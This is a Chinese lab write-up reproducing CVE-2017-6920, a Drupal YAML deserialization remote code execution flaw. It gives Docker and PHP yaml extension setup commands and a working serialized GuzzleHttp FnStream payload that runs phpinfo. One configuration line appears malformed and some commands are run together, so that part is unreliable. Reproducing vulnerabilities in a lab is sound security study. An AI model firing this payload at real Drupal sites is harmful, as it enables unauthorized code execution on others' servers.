漏洞描述
- 影响软件:Drupal
- 方式:反序列化
- 参考链接:CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
- 效果:任意代码执行
漏洞环境及利用
搭建docker环境
环境启动后,访问 将会看到drupal的安装页面,一路默认配置下一步安装。 因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
访问ip:8080
- 先安装 扩展
yaml(在容器中!!!)
# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源 cd /etc/apt 这里官方提供的没有切换路径,需要自己切换以下,可以cat sources.list看有没有换源成功cat << EOF > /etc/apt/sources.list deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse EOF 这里用阿里云的源,网易的失效了 #导入阿里源的公钥,否则下一步更新源会报错 apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C# 安装依赖 apt update apt-get -y install gcc make autoconf libc-dev pkg-configapt-get -y install libyaml-dev # 安装yaml扩展 pecl install yaml docker-php-ext-enable yaml.so# 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini # 退出容器 exit# 重启容器,CONTAINER换成自己的容器ID docker restart CONTAINER
payload
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
phpinfo成功执行,漏洞复现成功
